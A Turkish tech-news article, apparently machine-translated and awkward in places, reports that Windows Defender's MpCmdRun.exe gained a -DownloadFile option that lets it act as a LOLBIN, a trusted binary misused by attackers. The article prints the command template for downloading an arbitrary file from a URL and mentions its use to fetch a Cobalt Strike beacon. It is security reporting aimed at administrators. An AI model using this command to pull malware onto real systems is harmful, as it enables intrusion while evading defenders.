Windows Defender, yöneticiler için tehlikeli bir uygulamaya dönüşüyor

  • pencereler defans oyuncusu pencereler 10, sisteminizi savunmak için harika bir araçtır, ancak yeni bir güncelleme onu bir tehdide dönüştürdü.
  • Yeni bir İndirme Dosyası komutu, bilgisayarınızdaki kötü amaçlı yazılımlar da dahil olmak üzere herhangi bir harici dosyayı indirmek için kullanılabilir..
  • Keşfedin Yazılım bölümü en yeni dijital araçlar hakkında en iyi makaleler için.
  • En son Windows 10 makaleleriyle ilgileniyorsanız, kapsamlı makalemizi ziyaret edin. Windows 10 Merkezi.
Windows Defender bir LOLBIN'e dönüşüyor

Windows 10'daki Windows Defender, kötü amaçlı yazılım saldırıları durumunda ilk savunma hattıdır ve ayrıca çok iyi iş.

Ancak, yeni güncellemelerinden birinde, güçlü antivirüs, herkesin herhangi bir dosyayı bir URL'den bilgisayarınızdaki belirli bir yola indirmesine izin verecek yeni bir DownloadFile komutu aldı.

Güvenlik araştırmacısı Mohammad Askar tarafından keşfedilen bir şey olan kötü amaçlı yazılımları indirmek için bile kullanılabildiğinden buna bir istismar diyebiliriz. gönderildi Twitter'da yaptığı tespit.

Windows Defender kötü amaçlı yazılımları indirmek için nasıl kullanılabilir?

Herhangi bir dosyayı harici bir kaynaktan bilgisayarınıza indirmek için Microsoft Kötü Amaçlı Yazılımdan Koruma Hizmeti Komut Satırı Yardımcı Programını (MpCmdRun.exe) kullanmak gerçekten çok basit.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

Askar, yaptığı denemede bu komut satırını kullanarak iyi bilinen bir saldırgan aracı olan Cobalt Strike beacon'ı indirmeyi başardı.

Yeni komut sürüme dahil edilmiştir 4.18.2007.8-0 ve üzeri, bu da saldırganlar için oldukça iyi bir başlangıç ​​zamanı sağlıyor.

Temel olarak, bu özellik döner Windows Defender kötü amaçlar için kullanılabilecek zararsız bir sistem dosyası olan bir LOLBIN'e (hatta yaşayan ikili dosyalar) dönüştürün.

Neyse ki, zararlı dosyayı indirdikten sonra, aynı Windows Defender veya başka biri tarafından algılanacaktır. antivirüs yazılımı varsa.

Windows Defender, güvenilir bir koruma yazılımından, yöneticiler ve güvenlik uzmanları tarafından yakından izlenmesi gereken başka bir olası tehdide dönüştü.

Herhangi bir öneriniz veya yorumunuz varsa, lütfen bunları aşağıdaki Yorumlar bölümünde bırakın.

Basit Sekme Grupları eklentisini kullanarak Firefox sekmelerini daha iyi yönetme

Basit Sekme Grupları eklentisini kullanarak Firefox sekmelerini daha iyi yönetmeÇeşitli

Verimliliğinizi en üst düzeye çıkarmak için tarayıcı sekmelerinizi düzgün bir şekilde yönetmek söz konusu olduğunda biraz yardıma mı ihtiyacınız var?Firefox tarayıcısını kullanıyorsanız, Basit Sekm...

Devamını oku
Dying Light 2'de muhteşem görseller için Işın İzleme nasıl etkinleştirilir

Dying Light 2'de muhteşem görseller için Işın İzleme nasıl etkinleştirilirÇeşitli

Nihai Dying Light 2 Stay Human deneyimini aramak, yalnızca gerçek bir oyuncuysanız ve kendinizi tamamen aksiyona kaptırmak istiyorsanız doğaldır.Bu özellik, oyunun konsol versiyonunda varsayılan ol...

Devamını oku
DÜZELTME: Windows 10 bilgisayarlarda HTTP hatası 400

DÜZELTME: Windows 10 bilgisayarlarda HTTP hatası 400Çeşitli

Tarayıcı gibi bir istemci istekte bulunduğunda sunucu tarafından bir HTTP kodu gönderilir. HTTP hata kodu 400 Hatalı İstek bir istemci hatasıdır ve sunucu temelde devam etmeyeceğini söylüyor.Arama ...

Devamını oku